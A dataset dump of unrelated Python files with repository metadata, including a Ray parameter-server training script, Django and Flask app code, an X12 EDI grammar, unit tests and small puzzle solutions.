le_key = d[le_u]['od'].keys()[0]
continue
#print "3. ", le_key
#print "4. ", le_key, le_u
#print "5. ", d[le_u]
v = d[le_u]['od'][le_key][0]
#print "6. ", le_u, v, le_key
return le_u, v, le_key
'''
| [
"aubin.sanyal@gmail.com"
] | aubin.sanyal@gmail.com |
feb3861b0c0a06a508fdf4a0748c05fe0b8f72be | 0f00c8a02e8dc1d8136b2afc92338108f92cc6ae | /recipes/mrbayes/run_test.py | 40033ea2ed9721ad50dfc69b067eccb43cef93ff | [] | no_license | faircloth-lab/conda-recipes | 3714f5be83753261bf3abc70454bdf6b7028c8d6 | 75a520a75a357ea47ee80262f3c3a6dfe1b0715f | refs/heads/master | 2021-01-20T07:07:05.705307 | 2015-06-16T13:50:18 | 2015-06-16T13:50:18 | 12,671,015 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
(c) 2013 Brant Faircloth || http://faircloth-lab.org/
All rights reserved.
This code is distributed under a 3-clause BSD license. Please see
LICENSE.txt for more information.
Created on 30 December 2013 16:33 PST (-0800)
"""
import unittest
import subprocess
class TestMb(unittest.TestCase):
    """Smoke test: the serial ``mb`` binary prints its expected banner."""

    def test_mb(self):
        # Invoke MrBayes with -h and capture its banner.
        cmd = ["mb", "-h"]
        proc = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        self.stdout, self.stderr = proc.communicate()
        # Keep lines 0, 2 and 4 of the output, stripped.
        # NOTE(review): on Python 3 communicate() returns bytes, so
        # split("\n") would raise — this appears to target Python 2.
        text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
                if k in range(0, 6, 2)]
        assert text == [
            '',
            'MrBayes v3.2.2 x64',
            '(Bayesian Analysis of Phylogeny)'
        ]
class TestMbMpi(unittest.TestCase):
    """Smoke test: the MPI ``mb-mpi`` binary prints its expected banner."""

    def test_mb(self):
        # Invoke the parallel build with -h and capture its banner.
        cmd = ["mb-mpi", "-h"]
        proc = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        self.stdout, self.stderr = proc.communicate()
        # Keep lines 0, 2 and 4 of the output, stripped.
        # NOTE(review): bytes-vs-str caveat as in TestMb above.
        text = [v.strip() for k, v in enumerate(self.stdout.split("\n"))
                if k in range(0, 6, 2)]
        assert text == [
            'MrBayes v3.2.2 x64',
            '(Bayesian Analysis of Phylogeny)',
            '(Parallel version)'
        ]
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| [
"brant@faircloth-lab.org"
] | brant@faircloth-lab.org |
8c49afcd2557458371bc37031be00356b871799d | 092e00ae8389811929a381637b73dcb2303fefeb | /blog/domain/user.py | 338592ec2da4b0e0020f532f84602d13ba2ace07 | [] | no_license | uiandwe/rest_framework_ex | 33cfb73e386785009b1d012a3dfa6909bdc74ab3 | 8130bcf9a6ffd67b91906c85d66ed9d8d453bab8 | refs/heads/master | 2022-11-27T20:56:26.911462 | 2021-10-12T07:46:17 | 2021-10-12T07:46:17 | 234,095,110 | 0 | 0 | null | 2022-11-22T05:17:55 | 2020-01-15T14:12:34 | Python | UTF-8 | Python | false | false | 220 | py | # -*- coding: utf-8 -*-
class User:
    """Plain value object holding a user's e-mail address and display name."""

    def __init__(self, email, username):
        # Values are stored verbatim; no validation is performed here.
        self.email = email
        self.username = username

    def __repr__(self):
        # Keeps the original "email, username" rendering.
        return f"{self.email}, {self.username}"
| [
"uiandwe@gmail.com"
] | uiandwe@gmail.com |
01963dfede8f5f05b7ffa0c3d4400f87db8be7ca | eae1829b4a629571a9e3821760cf6c7e2547b300 | /cifar_asgd_new.py | dfb193cce4191c71d4b11ca0ad712fe51cb6f42a | [] | no_license | zdpau/Sync-Async_PS | 1b3131a3a7d135bb3d62896ca3dd74ba6d18aa30 | 86a1c71960b70d86cad9c6f97a8a3932a1cb79ff | refs/heads/master | 2021-07-21T10:16:34.547532 | 2018-12-19T09:29:39 | 2018-12-19T09:29:39 | 140,381,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,144 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import ray
import tensorflow as tf
import cifar10
import cifar10_train
import time
from collections import deque
import random
import sys
# Total training iterations; later divided evenly among the worker nodes.
numLoops = 5000

FLAGS = tf.app.flags.FLAGS
# tf.app.flags.DEFINE_string('param_name', 'default_val, 'description')
tf.app.flags.DEFINE_string('train_dir', 'cifar10_train',
                           """Directory where to write event logs """
                           """and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
                            """Number of batches to run.""")
tf.app.flags.DEFINE_integer('log_frequency', 10,
                            """How often to log results to the console.""")
tf.app.flags.DEFINE_integer('num_examples', 10000,
                            """Number of examples to run.""")
tf.app.flags.DEFINE_integer('num_nodes', 1,
                            """Number of nodes.""")
# Minimum age (seconds) a pushed gradient must reach before the parameter
# server applies it — simulates staleness in asynchronous training.
tf.app.flags.DEFINE_float('delay', 0, """delay""")
tf.app.flags.DEFINE_boolean('sync', False, """synchronous mode""")
tf.app.flags.DEFINE_boolean('serial', False, """serial mode""")
def t():
    """Shorthand for the current wall-clock time in seconds since the epoch."""
    now = time.time()
    return now
@ray.remote
class ParameterServer(object):
    """Delay-buffered parameter server actor.

    Pushed gradients are timestamped and queued; on each ``pull`` only
    gradients at least FLAGS.delay seconds old are folded into the weights,
    which models stale asynchronous updates.
    """
    def __init__(self, keys, values, num_nodes):
        self.grad_buf = deque()
        # Copy so workers cannot mutate the server's weights in place.
        values = [value.copy() for value in values]
        self.weights = dict(zip(keys, values))
        self.num_nodes = num_nodes
    def push(self, keys, values):
        """Queue a gradient update, stamped with its arrival time."""
        # print (a)
        timeline = (t(), keys, values)
        #print(timeline)
        self.grad_buf.append(timeline)
        # print (grad_buf)
    def update(self, keys, values):
        """Apply one gradient, scaled down by the number of nodes."""
        for key, value in zip(keys, values):
            self.weights[key] += value / self.num_nodes
    def pull(self, keys):
        """Apply all sufficiently old queued gradients, then return weights."""
        tau0 = t()
        while len(self.grad_buf) > 0:
            # Buffer is in arrival order, so stop at the first too-young entry.
            if self.grad_buf[0][0] < tau0 - FLAGS.delay:
                entry = self.grad_buf.popleft()
                self.update(entry[1], entry[2])
            else:
                break
        return [self.weights[key] for key in keys]
@ray.remote
class Worker(object):
    """Ray actor training a local CIFAR-10 model against the parameter server.

    Each worker keeps its own shuffled visit order of the training images
    and, per cycle, pulls fresh weights, computes one update, and pushes
    the resulting gradients back (fire-and-forget).
    """
    def __init__(self, ps, num, zero):
        self.net = cifar10_train.Train()
        self.keys = self.net.get_weights()[0]
        self.zero = zero
        self.num = num
        self.ps = ps
        self.counter = 0
        # Private shuffled ordering over the training set.
        self.indexes = list(range(len(self.net.images)))
        random.shuffle(self.indexes)
        weights = ray.get(self.ps.pull.remote(self.keys))
        self.net.set_weights(self.keys, weights)
        self.addr = ray.services.get_node_ip_address()
    def execOne(self, c):
        """Compute gradients for the c-th (wrapped) sample and log the loss."""
        index = self.indexes[c % len(self.net.images)]
        im = self.net.images[index]
        lb = self.net.labels[index]
        gradients = self.net.compute_update(im, lb)
        print ("LOSS {} {} {:.6f} {}".format(self.num, c, time.time() - self.zero, self.net.lossval))
        sys.stdout.flush()
        return gradients
    def computeOneCycle(self):
        """Pull weights, run one step, and push gradients asynchronously."""
        weights = ray.get(self.ps.pull.remote(self.keys))
        self.net.set_weights(self.keys, weights)
        gradients = self.execOne(self.counter)
        self.counter += 1
        self.ps.push.remote(self.keys, gradients)
        return 1 # dummy to sync
    def go(self, times, independent=False):
        """Run *times* cycles; independent=True skips the parameter server."""
        for c in range(times):
            if independent:
                self.execOne(c)
            else:
                self.computeOneCycle()
        return 1
    def get_addr(self):
        # IP of the node this actor landed on; used to enforce one worker per host.
        return self.addr
def createWorkers(num_workers, ps, zero):
    ''' create one worker per one node '''
    # Spawn actors repeatedly, keeping only the first actor that lands on
    # each distinct host IP, until num_workers distinct hosts are covered.
    # Actors landing on an already-used host are simply abandoned.
    hosts = []
    workers = []
    counter = 0
    while counter < num_workers:
        worker = Worker.remote(ps, counter, zero)
        addr = ray.get(worker.get_addr.remote())
        if addr in hosts:
            ''' throw away worker '''
            continue
        workers.append(worker)
        hosts.append(addr)
        counter += 1
    return workers
def main(argv=None):
    """Entry point: reset the train dir, start the parameter server and one
    worker per node, then run training in sync, serial, or async mode."""
    # tf.app.flags.FLAGS._parse_flags(sys.argv)
    # cifar10.maybe_download_and_extract()
    if tf.gfile.Exists(FLAGS.train_dir):
        tf.gfile.DeleteRecursively(FLAGS.train_dir)
    tf.gfile.MakeDirs(FLAGS.train_dir)
    ray.init(num_gpus=2)
    # Build one local net just to obtain the initial weights for the server.
    net = cifar10_train.Train()
    all_keys, all_values = net.get_weights()
    ps = ParameterServer.remote(all_keys, all_values, FLAGS.num_nodes)
    zero = time.time()
    # workers = [Worker.remote(ps, n, zero) for n in range(FLAGS.num_nodes)]
    workers = createWorkers(FLAGS.num_nodes, ps, zero)
    global numLoops
    # Split the total iteration budget evenly across the nodes.
    numLoops = (int)(numLoops / FLAGS.num_nodes)
    if FLAGS.sync:
        # Lock-step: every worker completes a cycle before the next begins.
        print("SYNC mode")
        for _ in range(numLoops):
            ray.get([w.computeOneCycle.remote() for w in workers])
    elif FLAGS.serial:
        # Single worker, no parameter-server round trips.
        print("SERIAL mode")
        _ = ray.get(workers[0].go.remote(numLoops, independent=True))
    else:
        # Fully asynchronous: all workers loop without coordination.
        print("ASYNC mode")
        _ = ray.get([w.go.remote(numLoops, independent=False) for w in workers])
# tf.app.run() parses flags and then invokes main().
if __name__ == '__main__':
    tf.app.run()
| [
"noreply@github.com"
] | zdpau.noreply@github.com |
c0c5bf3b9e293f9e815bdb6e73677906bd3d0e31 | fad2c9d62fbc48230af447c980e641626c86c1d5 | /users/apps.py | 1231bc80c02815a3287789710efca12d72d86056 | [] | no_license | marcoapr/django-lab | 65a50d9736d52fddcf84cdf47c3b84f918e5b1d7 | 35856afa988ac619643919b50a11d8de2bfba856 | refs/heads/master | 2020-04-02T20:06:57.508267 | 2018-10-26T01:22:54 | 2018-10-26T01:22:54 | 154,758,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | """ User app configuration. """
from django.apps import AppConfig
class UsersConfig(AppConfig):
    """ User app config """
    # Dotted path Django uses to register this application.
    name = 'users'
    # Human-readable name shown in the admin.
    verbose_name = 'Users'
| [
"mperez@unitedvirtualities.com"
] | mperez@unitedvirtualities.com |
3e2e4ac2bfe11f943d6d864dc62bf236447cab5b | b8800f65c2955768b58c7d7fbd89647a644daed6 | /blog/models.py | b1d723e885fb9838448eac3c9471705c1f03e512 | [] | no_license | revianblue/my-first-blog | 791ae3db3f788a337c3db0986f11930eeff77e26 | a06af2e7f344e2e54be0ff677bfe403a721fea7e | refs/heads/master | 2021-01-20T01:04:46.380012 | 2017-04-24T13:38:10 | 2017-04-24T13:38:10 | 89,220,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | from django.db import models
from django.utils import timezone
class Post(models.Model):
    """Blog post with an author, title, body and publication timestamps.

    Field names are Turkish: yazar=author, baslik=title, yazi=body,
    yaratilma_tarihi=created at, yayinlanma_tarihi=published at.
    """
    yazar = models.ForeignKey('auth.User')
    baslik = models.CharField(max_length=200)
    yazi = models.TextField()
    yaratilma_tarihi = models.DateTimeField(default=timezone.now)
    yayinlanma_tarihi = models.DateTimeField(blank=True, null=True)

    def yayinla(self):
        """Mark the post as published now and persist it."""
        self.yayinlanma_tarihi = timezone.now()
        # Bug fix: the original read ``self.save`` without calling it, so the
        # publication date was never written to the database.
        self.save()

    def __str__(self):
        return self.baslik
| [
"araserbilgin@gmail.com"
] | araserbilgin@gmail.com |
48489ccc71bb088f7c28deb51e9c47dcd3617c1c | 43226c0909e4164c4f69f1e462e6d089100131ee | /leap year yes or no.py | d610078f8b940c1822590c71a8c7421509a33a61 | [] | no_license | subashbabu97/leapyear | 8bf9e0449b65305c423350c5117d744304bee68b | 5cf9440abd8468f469dcf6fe30b43f54df84f92c | refs/heads/master | 2020-05-31T22:55:34.982996 | 2019-06-06T06:51:11 | 2019-06-06T06:51:11 | 190,529,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | a=int(input("Input:"))
b=a%4
if b==0:
print("Output:yes")
else:
print("Output:no")
| [
"noreply@github.com"
] | subashbabu97.noreply@github.com |
291145b4c5ed899fc48d811be2dd62caa2b32b4a | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4010/819004010.py | 23f27f88966ad294e1ec85c55e27af7395e422d6 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,730 | py | from bots.botsconfig import *
from records004010 import recorddefs
# Bots EDI grammar data for X12 transaction set 819 ("Joint Interest
# Billing and Operating Expense Statement"), version 004010.
syntax = {
    'version': '00403',  # version of ISA to send
    'functionalgroup': 'JB',
}

# Segment hierarchy: each entry gives the segment ID, its min/max repeat
# counts, and (via LEVEL) its nested child segments.
structure = [
    {ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
        {ID: 'BOS', MIN: 1, MAX: 1},
        {ID: 'CUR', MIN: 0, MAX: 1},
        {ID: 'ITD', MIN: 0, MAX: 5},
        {ID: 'N1', MIN: 0, MAX: 10, LEVEL: [
            {ID: 'N2', MIN: 0, MAX: 2},
            {ID: 'N3', MIN: 0, MAX: 2},
            {ID: 'N4', MIN: 0, MAX: 1},
            {ID: 'REF', MIN: 0, MAX: 12},
            {ID: 'MSG', MIN: 0, MAX: 12},
            {ID: 'PER', MIN: 0, MAX: 3},
        ]},
        {ID: 'JIL', MIN: 1, MAX: 10000, LEVEL: [
            {ID: 'PID', MIN: 0, MAX: 99999},
            {ID: 'REF', MIN: 0, MAX: 12},
            {ID: 'MSG', MIN: 0, MAX: 12},
            {ID: 'MEA', MIN: 0, MAX: 10},
            {ID: 'ITA', MIN: 0, MAX: 10},
            {ID: 'PSA', MIN: 0, MAX: 1},
            {ID: 'DTM', MIN: 0, MAX: 1},
            {ID: 'JID', MIN: 0, MAX: 1000, LEVEL: [
                {ID: 'PID', MIN: 0, MAX: 99999},
                {ID: 'DTM', MIN: 0, MAX: 10},
                {ID: 'REF', MIN: 0, MAX: 12},
                {ID: 'MSG', MIN: 0, MAX: 12},
                {ID: 'MEA', MIN: 0, MAX: 5},
            ]},
        ]},
        {ID: 'AMT', MIN: 1, MAX: 1},
        {ID: 'QTY', MIN: 0, MAX: 5},
        {ID: 'TDS', MIN: 0, MAX: 1},
        {ID: 'PSA', MIN: 0, MAX: 1000, LEVEL: [
            {ID: 'N1', MIN: 0, MAX: 1},
            {ID: 'N2', MIN: 0, MAX: 2},
            {ID: 'N3', MIN: 0, MAX: 2},
            {ID: 'N4', MIN: 0, MAX: 1},
            {ID: 'DTM', MIN: 0, MAX: 1},
            {ID: 'REF', MIN: 0, MAX: 12},
            {ID: 'PER', MIN: 0, MAX: 3},
        ]},
        {ID: 'CTT', MIN: 1, MAX: 1},
        {ID: 'SE', MIN: 1, MAX: 1},
    ]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
51086a37acacb82ec4da2e56fe316b05793a58d1 | 2335e7d1c10d800abb10b4432465f29a4456548d | /setup.py | 721f1b8d75682c30d9183bd741ff5d826e50db7d | [
"LicenseRef-scancode-warranty-disclaimer",
"EFL-2.0"
] | permissive | deathbybandaid/Sopel-StartupMonologue | 48a7e85ca117c630cf8039af76a0bbaea91ff5a1 | f495344cee379e66ec5022e1e7edf15f075c758c | refs/heads/master | 2020-05-09T11:18:01.564022 | 2019-04-27T14:12:38 | 2019-04-27T14:12:38 | 181,074,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from setuptools import setup, find_packages
if __name__ == '__main__':
print('Sopel does not correctly load modules installed with setup.py '
'directly. Please use "pip install .", or add {}/sopel_modules to '
'core.extra in your config.'.format(
os.path.dirname(os.path.abspath(__file__))),
file=sys.stderr)
with open('README.md') as readme_file:
readme = readme_file.read()
with open('NEWS') as history_file:
history = history_file.read()
with open('requirements.txt') as requirements_file:
requirements = [req for req in requirements_file.readlines()]
with open('dev-requirements.txt') as dev_requirements_file:
dev_requirements = [req for req in dev_requirements_file.readlines()]
setup(
name='sopel_modules.startupmonologue',
version='0.1.0',
description='Sopel Startup Monologue displays to all channels that the bot is online',
long_description=readme + '\n\n' + history,
author='Sam Zick',
author_email='sam@deathbybandaid.net',
url='https://github.com/deathbybandaid/Sopel-StartupMonologue',
packages=find_packages('.'),
namespace_packages=['sopel_modules'],
include_package_data=True,
install_requires=requirements,
tests_require=dev_requirements,
test_suite='tests',
license='Eiffel Forum License, version 2',
)
| [
"sam@deathbybandaid.net"
] | sam@deathbybandaid.net |
9f0e3f8373e8127285738a76f06d09c19699634c | 7a3dec909e1a36622c66a743968a631644a1e830 | /src/uploaders/tests/test_xml_uploader.py | 2609bba6e75a537948f5c989832786ccf1820c27 | [
"MIT"
] | permissive | fares-data-build-tool/fdbt-reference-data-service | c8388e2f7912e3ef678968efb876935d3aa438e3 | d60506edf24c723a7d56a7ff7b6586f1c1e9989d | refs/heads/develop | 2021-07-19T13:26:33.707021 | 2021-04-22T15:10:02 | 2021-04-22T15:10:02 | 247,682,844 | 2 | 0 | MIT | 2021-04-28T10:56:41 | 2020-03-16T11:16:35 | Python | UTF-8 | Python | false | false | 3,533 | py | import os
from unittest.mock import patch, MagicMock
import boto3
from txc_uploader.txc_processor import download_from_s3_and_write_to_db, extract_data_for_txc_operator_service_table, collect_journey_pattern_section_refs_and_info, collect_journey_patterns, iterate_through_journey_patterns_and_run_insert_queries
from tests.helpers import test_xml_helpers
from tests.helpers.test_data import test_data
mock_data_dict = test_xml_helpers.generate_mock_data_dict()
class TestDatabaseInsertQuerying:
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_link_table')
@patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_table')
def test_insert_methods_are_called_correct_number_of_times(self, mock_jp_insert, mock_jpl_insert):
service = mock_data_dict['TransXChange']['Services']['Service']
mock_journey_patterns = collect_journey_patterns(
mock_data_dict, service)
mock_jp_insert.side_effect = [
9, 27, 13, 1, 11, 5, 28, 12, 10, 6, 13, 27, 4]
mock_cursor = MagicMock()
mock_op_service_id = 12
iterate_through_journey_patterns_and_run_insert_queries(
mock_cursor, mock_data_dict, mock_op_service_id, service)
assert mock_jp_insert.call_count == len(mock_journey_patterns)
assert mock_jpl_insert.call_count == len(mock_journey_patterns)
class TestDataCollectionFunctionality:
    """Unit tests for the pure data-extraction helpers, driven by the shared
    mock TransXChange document (mock_data_dict)."""
    def test_extract_data_for_txc_operator_service_table(self):
        """Operator + service metadata is flattened into the expected DB row tuple."""
        expected_operator_and_service_info = (
            'ANWE', '2018-01-28', 'ANW', 'Macclesfield - Upton Priory Circular', 'NW_01_ANW_4_1', 'Macclesfield', 'Macclesfield')
        operator = mock_data_dict['TransXChange']['Operators']['Operator']
        service = mock_data_dict['TransXChange']['Services']['Service']
        assert extract_data_for_txc_operator_service_table(
            operator, service) == expected_operator_and_service_info
    def test_collect_journey_pattern_section_refs_and_info(self):
        """Section refs/info are collected from the raw journey pattern list."""
        mock_raw_journey_patterns = mock_data_dict['TransXChange'][
            'Services']['Service']['StandardService']['JourneyPattern']
        assert collect_journey_pattern_section_refs_and_info(
            mock_raw_journey_patterns) == test_data.expected_list_of_journey_pattern_section_refs
    def test_collect_journey_patterns(self):
        """Full journey patterns are assembled from the document plus service."""
        service = mock_data_dict['TransXChange']['Services']['Service']
        assert collect_journey_patterns(
            mock_data_dict, service) == test_data.expected_list_of_journey_patterns
class TestMainFunctionality:
@patch('txc_uploader.txc_processor.write_to_database')
def test_integration_between_s3_download_and_database_write_functionality(self, db_patch, s3, cloudwatch):
dir_path = os.path.dirname(os.path.realpath(__file__))
mock_file_dir = dir_path + '/helpers/test_data/mock_txc.xml'
mock_bucket = 'test-bucket'
mock_key = 'tnds/WM/test-key'
db_connection = MagicMock()
logger = MagicMock()
conn = boto3.resource('s3', region_name='eu-west-2')
# pylint: disable=no-member
conn.create_bucket(Bucket=mock_bucket)
s3.put_object(Bucket=mock_bucket, Key=mock_key,
Body=open(mock_file_dir, 'rb'))
download_from_s3_and_write_to_db(
s3, cloudwatch, mock_bucket, mock_key, mock_file_dir, db_connection, logger)
db_patch.assert_called_once_with(
mock_data_dict, 'WM', 'tnds', mock_key, db_connection, logger, cloudwatch)
| [
"noreply@github.com"
] | fares-data-build-tool.noreply@github.com |
5cb33ac9f43d4cdcb1e19f70d4624b4fa4b74cb0 | 6a7cf44a3cdce674bd0659f81f830826caac34e1 | /Lessons/lol.py | 0c454d9399717a381f486f94fb7b1c9387163d25 | [] | no_license | Ethansu/Random-Python | 9f1b6198968091cd3f356ad2962d0efdc455c76a | 4b1b18e1cb6c04f1195082c5d0899f476e234a55 | refs/heads/master | 2021-05-06T02:10:18.163866 | 2017-12-17T00:53:14 | 2017-12-17T00:53:14 | 114,498,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #import unittest
#from homework_6 import Car
def lol(x):
    """Return (x + 1) divided by 4, using true division."""
    shifted = x + 1
    return shifted / 4
"jingchunsumacc@gmail.com"
] | jingchunsumacc@gmail.com |
e134d1f0bece4a5e209fd10eaedcb6493c8f17b2 | e67b0c01d7244f1c635d7c2e12157076bcd2efbc | /finalproject/app.py | c4341f5d265bdc737da29944cf08361513cc42c2 | [] | no_license | SonjaGrusche/LPTHW | 0a7de74101db1b0ae62ffc35d4fac990c894ae14 | 12483e97373c9e0aa9e8785b20bb34e1e5b4b36a | refs/heads/master | 2021-01-12T15:52:06.404665 | 2017-03-21T10:27:53 | 2017-03-21T10:27:53 | 71,830,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,293 | py | from flask import Flask, session, request
from flask import url_for, redirect, render_template
from random import randint
import resources
app = Flask(__name__)
@app.route('/', methods=['GET'])
def start_get():
    # Landing page: render the static start template.
    return render_template('start.html')
@app.route('/questionnaire', methods=['GET'])
def questionnaire_get():
    # Render the questionnaire form with the question list from resources.
    return render_template('questionnaire.html', questions=resources.questions)
@app.route('/questionnaire', methods=['POST'])
def questionnaire_post():
    """Sum the ten submitted answers and redirect to the result page.

    A missing field makes form.get return None (TypeError on int()); a
    non-numeric value raises ValueError. Both now re-render the form with an
    error flag — previously ValueError escaped and produced a 500.
    """
    totals = 0
    for i in range(1, 11):
        try:
            totals += int(request.form.get('question' + str(i)))
        except (TypeError, ValueError):
            return render_template('questionnaire.html', questions=resources.questions, error=1)
    # The +20 offset shifts the raw total into the score ranges used by result().
    return redirect(url_for('result', total=totals+20))
@app.route('/result/<int:total>')
def result(total):
    """Map the questionnaire score to a link bucket and show a random match.

    Buckets cover scores 0-32. Previously a score outside every range left the
    bucket variable unbound (UnboundLocalError -> 500); out-of-range scores now
    fall into the nearest bucket. Also renames the local away from the builtin
    `type`.
    """
    if total < 10:
        bucket = 0
    elif total < 20:
        bucket = 1
    elif total < 26:
        bucket = 2
    elif total < 30:
        bucket = 3
    else:
        bucket = 4
    # Pick one random link from the matched bucket.
    website = resources.links[bucket][randint(0, len(resources.links[bucket]) - 1)]
    return render_template('results.html', site=website)
# NOTE(review): hard-coded session secret; load from env/config in production.
app.secret_key = '1234supersecret'
if __name__ == "__main__":
    app.run()
| [
"sonja.grusche@stud.leuphana.de"
] | sonja.grusche@stud.leuphana.de |
10515479aab3316ae2f634ef92fdf2aed4b5593f | 464be1d96c23380f2f4d646490928c5995d199c2 | /leet/l36.py | 431afc4e7274d4fc3a944ab25cc23ffd50b5292a | [] | no_license | TatsuLee/pythonPractice | 4c8d83fabd01b36b480c8ef1b9ff656a8d09b026 | 628c536007d131ff91f2057d863c029b2efb1bb1 | refs/heads/master | 2021-07-24T16:46:53.914031 | 2017-10-28T10:21:28 | 2017-10-28T10:21:28 | 68,804,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | class Solution(object):
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# generate 3 empty list to store scaned nums
row = [set() for i in range(9)]
col = [set() for i in range(9)]
grid = [set() for i in range(9)]
for i in range(9):
for j in range(9):
curDigit = board[i][j]
if curDigit == '.':
continue
if curDigit in row[i]:
return False
if curDigit in col[j]:
return False
k = i/3*3+j/3 # find the grid num with (i,j)
if curDigit in grid[k]:
return False
grid[k].add(curDigit)
row[i].add(curDigit)
col[j].add(curDigit)
return True
| [
"dli37@hawk.iit.edu"
] | dli37@hawk.iit.edu |
364d6a8b4e45dedb56ee9f02ada48d814d3f2292 | 4ccc8d6e163b156e06a5c107a6a28681184a8a03 | /2021/day_05.py | 7f2b6f57581f3a8cc0b6db5b969eb1f474bb5c19 | [] | no_license | mmercedes/adventofcode | 798925a2b8403948c16d68b9e195c148d0a69b8a | 306cffadafb48863277295cf9ed56e95699d92e6 | refs/heads/master | 2022-01-01T09:25:38.974142 | 2021-12-14T18:33:07 | 2021-12-14T18:33:07 | 159,980,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python
import re
def lookup_insert(m, x, y):
    """Increment the hit count for point (x, y) in the nested counter dict m.

    m maps x -> {y -> count}; missing entries are created on first use.
    """
    row = m.setdefault(x, {})
    row[y] = row.get(y, 0) + 1
def insert_line(m, x1, y1, x2, y2):
    # Rasterize the segment (x1, y1) -> (x2, y2) into the counter dict m,
    # stepping one unit per axis per iteration (handles horizontal, vertical
    # and 45-degree diagonal lines).
    dx = 1 if (x1 < x2) else -1
    dy = 1 if (y1 < y2) else -1
    i, j = (x1, y1)
    # The endpoint is counted up front; the loop below stops just before it.
    lookup_insert(m, x2, y2)
    while ((i != x2) or (j != y2)):
        lookup_insert(m, i, j)
        if (i != x2): i += dx
        if (j != y2): j += dy
def day5():
    """Advent of Code 2021 day 5: count grid points covered by 2+ vent lines.

    Part 1 counts only horizontal/vertical lines; part 2 counts every line,
    45-degree diagonals included.
    """
    p1_lookup = {}
    p2_lookup = {}
    with open("./inputs/input_05.txt") as f:
        for line in f:
            m = re.match(r"(?P<x1>[0-9]+),(?P<y1>[0-9]+) -> (?P<x2>[0-9]+),(?P<y2>[0-9]+)", line).groupdict()
            x1, y1, x2, y2 = (int(m['x1']), int(m['y1']), int(m['x2']), int(m['y2']))
            if (x1 == x2) or (y1 == y2):
                insert_line(p1_lookup, x1, y1, x2, y2)
            # Part 2 includes diagonals, so this insert must run for every
            # line (it previously sat inside the guard above, which made
            # p2_lookup identical to p1_lookup).
            insert_line(p2_lookup, x1, y1, x2, y2)
    p1_ans = sum(1 for ys in p1_lookup.values() for count in ys.values() if count > 1)
    p2_ans = sum(1 for ys in p2_lookup.values() for count in ys.values() if count > 1)
    print("p1 ans: %i" % p1_ans)
    print("p2 ans: %i" % p2_ans)
day5()
| [
"matthewmercedes@gmail.com"
] | matthewmercedes@gmail.com |
8de417f20989172bfac0cbb257285314d44a4cb5 | 09d81c119fb88b73c0968e6d384898ec1a65bb36 | /lab5/lab5/settings.py | 7990e2f20bbb476fd206cc294ebb34cc91767911 | [] | no_license | n10florin/nfir1917 | 8a92f5c3c32aecdaf56114ed205edbefa8f66902 | 11aca585d9b4d3bd17cd7fe8136967c2effe4c68 | refs/heads/master | 2021-04-12T09:54:08.639211 | 2018-05-17T11:28:46 | 2018-05-17T11:28:46 | 126,162,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for lab5 project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r3()ve1_7+x%9)(t5(%q19!=fqs9e3s$+0h#9d+$=^y2wtg-6$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'note.apps.NoteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lab5.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
